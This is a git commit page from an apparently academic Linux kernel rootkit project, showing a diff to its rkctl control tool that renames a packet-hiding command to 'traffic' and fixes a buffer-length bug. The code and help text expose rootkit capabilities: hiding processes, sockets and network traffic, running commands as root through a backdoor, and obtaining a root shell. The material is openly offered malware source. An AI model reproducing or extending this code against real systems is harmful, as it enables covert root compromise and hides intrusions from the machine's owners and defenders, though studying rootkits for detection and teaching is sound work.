linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs
commit d0029f1120d9c0d02821c6295c8093ab4fa7e25b
parent 9a24a6beaa28e244d39ce9e006aa183f119016c6
Author: deurzen <m.deurzen@tum.de>
Date:   Sun, 20 Dec 2020 21:00:47 +0100

changes command syntax from `packet` to `traffic`

Diffstat:

Msrc/rkctl/rkctl.c | 18+++++++++++-------


1 file changed, 11 insertions(+), 7 deletions(-)

diff --git a/src/rkctl/rkctl.c b/src/rkctl/rkctl.c
@@ -121,16 +121,18 @@ parse_input(int argc, char **argv)
     if (ARGVCMP(1, "sockethide-off"))
         return (cmd_t){ handle_tcphide, (void *)0 };
 
-    if (ARGVCMP(1, "packet")) {
-        ASSERT_ARGC(3, "packet <hide | unhide> <ip>");
+    if (ARGVCMP(1, "traffic")) {
+        ASSERT_ARGC(3, "traffic <hide | unhide> <ip>");
 
         if (ARGVCMP(2, "hide")) {
             size_t arglen = strlen(argv[3]);
             size_t maxlen = BUFLEN - 1;
             char *hide_ip = (char *)malloc(BUFLEN);
+
             memset(hide_ip, 0, BUFLEN);
             hide_ip[0] = (char)1;
-            memcpy(hide_ip + 1, argv[3], arglen < maxlen ? arglen : arglen);
+            memcpy(hide_ip + 1, argv[3], arglen < maxlen ? arglen : maxlen);
+
             return (cmd_t){ handle_packhide, (void *)hide_ip };
         }
 
@@ -138,13 +140,15 @@ parse_input(int argc, char **argv)
             size_t arglen = strlen(argv[3]);
             size_t maxlen = BUFLEN - 1;
             char *unhide_ip = (char *)malloc(BUFLEN);
+
             memset(unhide_ip, 0, BUFLEN);
             unhide_ip[0] = (char)-1;
-            memcpy(unhide_ip + 1, argv[3], arglen < maxlen ? arglen : arglen);
+            memcpy(unhide_ip + 1, argv[3], arglen < maxlen ? arglen : maxlen);
+
             return (cmd_t){ handle_packhide, (void *)unhide_ip };
         }
     }
-    if (ARGVCMP(1, "packethide-off"))
+    if (ARGVCMP(1, "traffichide-off"))
         return (cmd_t){ handle_packhide, (void *)0 };
 
     if (ARGVCMP(1, "backdoor")) {
@@ -300,8 +304,8 @@ help()
     printf("%-42s %s\n", "hidepid <add | rm> <PID>", "{,un}hide a process");
     printf("%-42s %s\n", "socket <hide | unhide> <tcp | udp> <port>", "{,un}hide a tcp or udp socket with the given port");
     printf("%-42s %s\n", "sockethide-off", "disable any (tcp or udp) socket hiding");
-    printf("%-42s %s\n", "packet <hide | unhide> <ip>", "{,un}hide packets from/to given ip address (IPv4 or IPv6)");
-    printf("%-42s %s\n", "packethide-off", "disable any packet hiding");
+    printf("%-42s %s\n", "traffic <hide | unhide> <ip>", "{,un}hide packets from/to given ip address (IPv4 or IPv6)");
+    printf("%-42s %s\n", "traffichide-off", "disable any traffic hiding");
     printf("%-42s %s\n", "backdoor <execve_command>", "exec a command as root");
     printf("%-42s %s\n", "shell", "obtain a shell as root");
     printf("%-42s %s\n", "backdoor-use-tty <0 | 1>", "listen for `make_me_root` on read (0) or TTY (1)");